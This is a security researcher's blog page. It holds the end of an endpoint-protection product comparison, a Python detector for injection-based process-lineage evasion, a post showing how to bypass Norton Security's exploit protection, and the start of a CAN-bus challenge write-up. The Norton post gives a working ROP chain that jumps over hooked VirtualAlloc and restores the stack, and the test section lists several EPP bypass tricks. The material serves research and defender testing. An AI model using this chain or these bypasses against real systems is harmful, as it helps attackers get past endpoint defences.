<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">4/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 18;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Not Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 (this means that if the same malware is
changed so that it produces a new hash, then 2 products will miss it)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 19;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: IOC bypass - migration to EXPLORER (CreateRemoteThread)<o:p></o:p></span></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 blocked, again by hooks; 1 product has ring3 hooks and could be bypassed<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 20;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Meterpreter TCP<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5 will detect the connection<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 21; mso-yfti-lastrow: yes;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Reverse DNS via svchost<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5 <o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<br />
<div class="11BodyText">
<h3 style="text-align: left;">
Outcome</h3>
<div>
Of course my tests <b>do not reflect anything except whether those solutions could pass just those tests</b>, with the exploits and backdoors chosen/created by me. On a different set of exploits and samples, or with different attacks, we could get different results! But some general things are there:</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li>No single EPP solution can protect you from 100% of attacks and threats! This means that if a targeted attack (like an APT) happens and <b>you are the main target - EPP will not help you!</b> </li>
<li>Some solutions do better at exploit prevention but suck at malware detection; others are more concentrated on "malware" detection but can't stop exploits well</li>
<li>Most exploit-protection/malware detection techniques used by EPP could be bypassed!</li>
<li>Two different solutions could stop the same attack (exploit), and the result looks the same, but in fact they stopped it at different stages, and that was what mattered to me: the earlier, the better </li>
<li>Vendors do not like public tests, that's why customers like me need to run those PoCs/tests to choose the right product by themselves. Do not trust "public" ratings; check for the solution that fits your organisation and responds to your threats. Gartner Magic Quadrant or NSS reports do not help much!</li>
<li>Most EPPs are cloud based... that creates additional problems for customers, especially if they collect too much data (like all system events on each endpoint or even file contents)</li>
<li>If you can use Win10 Device Guard and control all binaries/scripts - it will probably give you better endpoint security ;) </li>
</ul>
<div>
<br /></div>
</div>
<div>
<b>UPD</b><br />
<br />
Most typical NextGen "fails":</div>
<div>
<ul style="text-align: left;">
<li>"Corrupted" PE -> bypass checks/binary parsers</li>
<li>EXE detected, but same product can't detect same malware in DLL...</li>
<li>DLL detected, but same product can't detect same malware in EXE...</li>
<li>Ring3 hooks (already mentioned, https://asintsov.blogspot.de/2016/12/bypassing-exploit-protection-of-norton.html )</li>
<li>No signature checks... ok, but only VirusTotal hashes?</li>
<li>IE->exec(CMD) - detected! IE->migrate(EXPLORER)->exec(CMD) - not</li>
</ul>
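<div>
The last item in the list above is a process-lineage gap: once the code moves into explorer.exe, the shell's parent no longer looks suspicious. The following is an added example, not code from the original post, that carries the origin across a remote-thread hop. Field names follow Sysmon Event ID 1 (process creation) and Event ID 8 (CreateRemoteThread); the events, the GUID placeholders and the EXPOSED/SHELLS lists are constructed assumptions.</div>

```python
import ntpath

# Assumed policy lists: processes that parse untrusted content, and child
# processes that are rarely legitimate descendants of them.
EXPOSED = {"iexplore.exe", "winword.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path (works on any OS)."""
    return ntpath.basename(path).lower()


def correlate(events):
    """Alert on shells that descend from an exposed process, either directly
    or through remote-thread injection into an otherwise trusted process."""
    tainted = {}  # ProcessGuid -> image-name chain that led to the injection
    alerts = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if ev["EventID"] == 8:  # CreateRemoteThread
            source = image_name(ev["SourceImage"])
            if source in EXPOSED:
                chain = [source]
            else:
                # An already injected process injecting further keeps its origin.
                chain = tainted.get(ev["SourceProcessGuid"])
            if chain:
                target = image_name(ev["TargetImage"])
                tainted[ev["TargetProcessGuid"]] = chain + [target]
        elif ev["EventID"] == 1:  # ProcessCreate
            child = image_name(ev["Image"])
            if child not in SHELLS:
                continue
            parent = image_name(ev["ParentImage"])
            if parent in EXPOSED:
                alerts.append({"kind": "direct", "chain": [parent, child]})
            elif ev["ParentProcessGuid"] in tainted:
                chain = tainted[ev["ParentProcessGuid"]] + [child]
                alerts.append({"kind": "via_injection", "chain": chain})
    return alerts


IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed events; the GUID values are placeholders, not real Sysmon GUIDs.
SAMPLE_EVENTS = [
    # Browser starts a shell directly.
    {"EventID": 1, "UtcTime": "2017-05-01 10:00:10.000", "Image": CMD,
     "ParentImage": IE, "ParentProcessGuid": "{guid-ie}"},
    # Browser creates a thread inside explorer.exe ...
    {"EventID": 8, "UtcTime": "2017-05-01 10:00:20.000", "SourceImage": IE,
     "SourceProcessGuid": "{guid-ie}", "TargetImage": EXPLORER,
     "TargetProcessGuid": "{guid-explorer-a}"},
    # ... and that explorer.exe instance then starts a shell.
    {"EventID": 1, "UtcTime": "2017-05-01 10:00:25.000", "Image": CMD,
     "ParentImage": EXPLORER, "ParentProcessGuid": "{guid-explorer-a}"},
    # A different explorer.exe instance, never injected: the user opens cmd.
    {"EventID": 1, "UtcTime": "2017-05-01 10:00:30.000", "Image": CMD,
     "ParentImage": EXPLORER, "ParentProcessGuid": "{guid-explorer-b}"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["kind"], " -> ".join(alert["chain"]))
```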
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBSRL9-hLhH6QXc4xyggPioV9Vpm1k7NZ_Mxz76S27UUCqv_-MocVQxoV_k6hD_jAIOq3oU7vvWXA8Gtg1yaeLQkOkNDlF4u7MV0m0pcg4jlqvG_xtaXcpoxV4EspMUVXFMycBgmEZJmeZ/s1600/byapss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBSRL9-hLhH6QXc4xyggPioV9Vpm1k7NZ_Mxz76S27UUCqv_-MocVQxoV_k6hD_jAIOq3oU7vvWXA8Gtg1yaeLQkOkNDlF4u7MV0m0pcg4jlqvG_xtaXcpoxV4EspMUVXFMycBgmEZJmeZ/s400/byapss.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
I checked, @matalz is right... delays also work! lol...</div>
<div>
<br />
P.S. All vendors will fix at least the things I reported, and they were very promising on new features. They are not bad 8)</div>
<div>
<br /></div>
</div>
</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-77187676965365830372016-12-16T17:45:00.000-08:002017-01-11T17:50:40.967-08:00Bypassing Exploit protection of NORTON Security<div dir="ltr" style="text-align: left;" trbidi="on">
Hey, today I am not going to talk about CANToolz! Surprise 8)<br />
<br />
Let me start this story from the beginning - I just got a new laptop, and <b>Norton Security</b> was installed on it by default, with a 60-day evaluation period. And this is ok (except the part when Norton decided to delete my <b>Radare2</b>, that was awful...).<br />
<br />
One day I decided to test my old <b>Zeronights 2012 workshop</b> about x86 exploitation (<a href="http://www.slideshare.net/DefconRussia/sintsov-advanced-exploitation-in-win32">http://www.slideshare.net/DefconRussia/sintsov-advanced-exploitation-in-win32</a>). And I was surprised that <b>Norton</b> stopped my UAF exploit... good job! (If you are interested in that lab, you can get it here: <a href="https://github.com/defcon-russia/activex_workshop/tree/master/Use_After_Free_x32">https://github.com/defcon-russia/activex_workshop/tree/master/Use_After_Free_x32</a>)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1CupUKgRPXwYeVVMvvrnPl4n86OIATXdttKXZAOh1n-GQRBq7oUX8ebCNVgH2ijldrGHeF9fBw2hWxuD7FuBfTboZFhBxE1Xc4oZcd_JAa6g7uyr_9R4VjwP3b3Yc3NQmcRWHKSYMEl3h/s1600/block.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1CupUKgRPXwYeVVMvvrnPl4n86OIATXdttKXZAOh1n-GQRBq7oUX8ebCNVgH2ijldrGHeF9fBw2hWxuD7FuBfTboZFhBxE1Xc4oZcd_JAa6g7uyr_9R4VjwP3b3Yc3NQmcRWHKSYMEl3h/s640/block.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
But it was interesting to me - how it works and how we could bypass it... So I started playing with it online - while streaming this on our Twitch (<a href="https://www.twitch.tv/defconrussia">https://www.twitch.tv/defconrussia</a>, sorry, Russian language), so my friends from <b>Defcon-Russia</b> (<b>DC 7812</b>) could do it with me online 8)<br />
<br />
First finding: Norton could detect only stack pivots, and this is done with the help of ring3 hooks on critical functions like LoadLibrary, VirtualProtect and VirtualAlloc. They inject their JUMPS into the function's prologue and intercept all calls. In their handler they can check whether the current stack frame is "original". If not, they raise an exception like the one on that screenshot. So if no stack pivoting happens during the exploit (let's say a simple BoF where the ROP and the shellcode are in the same stack), the attack will not be detected or stopped.<br />
<br />
Let's see their hooks on VirtualAlloc where my ROP shellcode fails after StackPivot:<br />
<br />
First hook is in the kernel32 wrapper and then second hook in kernelbase:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipd6i97irLaPmjHW1_teiU1n89PdQAYNrE7ZDkRmzFqHDidq8ISk9ShaZLzN73WNS_0z7BdknXo-LGXyTtcTjiSpMWQ5eEfqo8ZNlBzODZi4655_IG23fpsrlQbIgmHXUGrSPJLLyOqpFB/s1600/hook1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipd6i97irLaPmjHW1_teiU1n89PdQAYNrE7ZDkRmzFqHDidq8ISk9ShaZLzN73WNS_0z7BdknXo-LGXyTtcTjiSpMWQ5eEfqo8ZNlBzODZi4655_IG23fpsrlQbIgmHXUGrSPJLLyOqpFB/s640/hook1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
This could be bypassed via different methods: for example, an attacker could copy the ROP shellcode with the VirtualAlloc call into the original stack with the help of a stage1 ROP shellcode and then switch the "original" stack frame back, or he could bypass the hooks by restoring the function's prologue and jumping over the hook. During the stream we decided to try both strategies just for fun:<br />
<br />
1) The ROP shellcode will bypass VirtualAlloc via jumps over the two hooks.<br />
2) Then the normal shellcode will restore the original stack frame and execute LoadLibrary and other functions without any exceptions.<br />
<br />
BTW, when I started this activity, <a href="https://twitter.com/matrosov">@matrosov</a> told me about their research, where this topic was covered as well: <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf">https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf</a> So this topic is a really well-known problem! And it looks like the guys from Symantec (and not only them; other security vendors have the same issues) are already aware of this.<br />
<br />
<h4 style="text-align: left;">
Bypassing two hooks in ROP's VirtualAlloc call:</h4>
My original exploit leaked a pointer to the VirtualAlloc call from kernel32. If we want to bypass these hooks, we need to call VirtualAlloc from kernelbase, and we need to "jump" to that address with an offset of 5 bytes from the beginning, directly to the first "push ecx".<br />
We did it like that:<br />
esi <- VirtualAlloc pointer<br />
<br />
So we build a ROP chain that does:<br />
<br />
mov eax, [esi + 8] ; read kernelbase.virtualalloc pointer<br />
mov eax, [eax] ; get this pointer<br />
add eax, 5 ; get pointer over the hook, directly to first "push ecx" <br />
<br />
But you cannot simply do "jmp eax", because the prologue of kernelbase.VirtualProtect was "overwritten" by the hook, so first you need to restore the original EBP value (because this register is used as a pointer to the parameters)<br />
<br />
lost VirtualAlloc prologue:<br />
<br />
push ebp<br />
mov ebp, esp<br />
<br />
So we need to be sure that at the moment of the jump we have a pre-calculated EBP value that is equal to ESP. This means that we need to do mov ebp,esp just before we do "jmp eax". Then the hook will be bypassed. Of course, when you do it via ROP it is a little bit more difficult, because ROP always changes the ESP pointer. But finally we did it (ROP for my vulnerable workshop ActiveX module, ASLR enabled, so the addresses here are just an example):<br />
<br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">1) This is ROP shellcode after stack pivot, we have original stack pointer stored in EDI</span><br />
<span style="font-size: x-small;">2) Let's pre-calc EBP (EBP should be same as ESP when VirtualAlloc will be called)</span><br />
<br />
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf2b484 : # POP EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>204 : # offset to EBP</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be63cd8 : # PUSH ESP # POP EBP # RETN 04 </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf014a9 : # XCHG EAX,EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x90909090 : # TRASH</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf08c87 : # ADD EAX,EBP # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf014a9 : # XCHG EAX,EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">3) Here we want to calc address of VirtualAlloc in kernelbase after all Norton's hooks</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"># EAX = kernelbase.virtalloc + offset_over_the_hook</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee1907 : # POP ECX # RETN [npexploitMe.dll] </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf32114 : # ptr to &VirtualAlloc() [IAT npexploitMe.dll]</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bed6fb0 : # MOV EAX,DWORD PTR DS:[ECX] # RETN [npexploitMe.dll]</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bedba6d : # ADD EAX,8 # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be629f9 : # MOV EAX,DWORD PTR DS:[EAX] # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be629f9 : # MOV EAX,DWORD PTR DS:[EAX] # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809a : # INC EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">4) Prepare parameters for VirtualAlloc</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf20010 : # XCHG EAX,ESI # RETN ; save VA in ESI</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be8936f : # XOR EAX,EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf08c87 : # ADD EAX,EBP # RETN ; EAX=EBP</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bed87dd : # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> ; EDX = EBP, pointer to place where we want to store our VA parameters</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x11223344 : # trash to esi</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf20010 : # XCHG EAX,ESI # RETN ; save VA in ESI</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be98313 : # MOV EAX,ESI # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; save VA call address (1)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN ; DWORD* pointer++</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; not needed, new EBP (2)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf2b484 : # POP EAX # RETN ; put return address after VA call into EAX </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be63ce2 : # PUSH ESP # RETN ; this will be executed after VA (goes to EAX right now)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; Return address (3)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bec1806 : # INC EDX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5be8936f : # XOR EAX,EAX # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bf08c87 : # ADD EAX,EBP # RETN ; EAX=EBP</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5beecf8e : # MOV DWORD PTR DS:[EDX],EAX # MOV EAX,3 # RETN ; pointer to page (4)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bef49e2 : # INC EBP # RETN ;fixing EBP, so now it is equal to ESP, prologue restored...</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x5bee809b : # RETN </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x11111111 : # This will be overwritten by (1)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x22222222 : # This will be overwritten by (2)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x22222222 : # Return address after VA call, will be overwritten by (3)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x33333333 : # First VA parameter - pointer, overwritten by (4)</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x00000001 : # Second VA parameter: size </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x00001000 : # Third VA parameter: AllocationType = MEM_COMMIT </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">>0x00000040 : # Last VA parameter: R_X </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
After that normal shellcode can be executed from R_X memory. We still have the original stack frame pointer in EDI, we did not use this register during ROP, so now shellcode could restore original stack frame (second strategy) and continue execution without problems from Norton Security:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
mov esp, edi</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now we have bypassed this protection and are able to execute our code for the workshop exploit with no problems. Too simple. And these tricks are kind of universal and will work in most setups (the same ROP and shellcode will be executed the same way on boxes with and without Norton, so an attacker will not need two different payloads/shellcodes)</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
P.S.</div>
<div style="text-align: left;">
For me it was fun to stream this small and simple "research" and I got a lot of help from the community; in the end we all had a fun time and learned something about security.</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com25tag:blogger.com,1999:blog-4711612808026791519.post-64237819016492849452016-05-30T08:36:00.003-07:002016-05-31T05:32:00.816-07:00PHDays: CAR4ALL challenge (part 1)<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
CAN reversing with CANToolz</h2>
<div>
<br /></div>
<div>
<a href="http://www.phdays.com/">PHDays</a> happened on May 17-18, in Moscow. It was a really great event and I believe PHDays is one of the best IT-Security events in Russia (but of course <a href="http://zeronights.org/">Zeronights </a>is the best of the best). And during this event there was a small CAR/CAN-quest prepared by my friends with a little support from me (as CANToolz developer). Here I want to do a small write-up about it. </div>
<div>
<br /></div>
<div>
On the first day of the conference we had an "offline" task with real CAN dumps. Those who solved this task got access to the second level on the second day of the conference. And this second task was based on a real vehicle that was parked inside the main venue. But let's go into more detail.<br />
<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihS-5Qzc_lKoWx17IIt0QLRTWihWdTi3qsa5uxUYsy3RWLx3TNc7su6Px6uFXuUrj_skc6RmD8GYklnsxAP8GAV8ssFHJ3e4hxu3L_zU7KSWGlDmRc2fbHwm3KaJiExq92-0-nq18pzfVe/s1600/pic1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihS-5Qzc_lKoWx17IIt0QLRTWihWdTi3qsa5uxUYsy3RWLx3TNc7su6Px6uFXuUrj_skc6RmD8GYklnsxAP8GAV8ssFHJ3e4hxu3L_zU7KSWGlDmRc2fbHwm3KaJiExq92-0-nq18pzfVe/s1600/pic1.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: right;">
_Saplt, _j0hnni3 and @Z0ha4</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Thx to HardwareVillage and team: Michael Elizarov (<a href="https://twitter.com/_Saplt" style="background-color: white; box-sizing: border-box; color: #4078c0; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; text-decoration: none;">@_Saplt</a>), <a href="https://twitter.com/Z0ha4" style="background-color: white; box-sizing: border-box; color: #4078c0; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; text-decoration: none;">@Z0ha4</a><span style="background-color: white; color: #333333; font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; line-height: 25.6px;">, Anton Sysoev and </span><span style="background-color: white; color: #333333; font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; line-height: 25.6px;"> </span><a href="https://twitter.com/_j0hnni3" style="background-color: white; box-sizing: border-box; color: #4078c0; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 16px; line-height: 25.6px; text-decoration: none;">@_j0hnni3</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
----></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a name='more'></a><br />
<br />
<h3 style="clear: both; text-align: left;">
1st TASK</h3>
<div>
<br />
<blockquote class="tr_bq">
</blockquote>
<span style="font-family: "courier new" , "courier" , monospace;">You have two DUMPS of CAN traffic: NOISE and EVENT. The EVENT dump contains the event of locking the vehicle. Based on these two dumps, please answer the following questions:<br /><br />1) Which CAN frame (ID, DATA) allows to lock the car<br />2) Which CAN frames (ID) tell us about door statuses (find at least two)<br />3) What type of vehicle is it (vendor/)?</span><br />
<br />
<b>DUMPS:</b><br />
<br />
<a href="http://canoctopus.ru/upload/NOISE.dump">NOISE</a> - dump of the CAN traffic from the car for 1 minute. Engine turned on. No Actions<br />
<a href="http://canoctopus.ru/upload/LOCK_ACTION.dump">EVENT</a> - dump of the CAN traffic from the car during lock event enabled. Engine turned on.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>SOLUTION:</b><br />
<br />
This task was supposed to be simple and fun (a fast filter to limit access to the real vehicle on the second day to those who really want to play). Let's start with the first part of the task: how to find the control frame that locks the car. Dump files have a simple format: ID:LENGTH:DATA_IN_HEX, so you can write a simple script to parse them or use CANToolz (this is the format of the REPLAY module of CANToolz). First of all, what we want: load the DUMP files and replay them to the <b>mod_stat</b> module for further analysis. For that we need a simple config file (first_config.py):</div>
<div style="text-align: left;">
<br /></div>
<div>
<pre style="background-color: white; font-family: 'Courier New'; font-size: 9.6pt; text-align: left;"># Load modules
load_modules = {
    'mod_stat'   : {},
    'gen_replay' : {}
}

# Scenario
actions = [
    {'gen_replay' : {'pipe': 1}},  # REPLAY
    {'mod_stat'   : {'pipe': 1}}   # Analyze
]</pre>
<div style="text-align: left;">
<br /></div>
<div>
<br /></div>
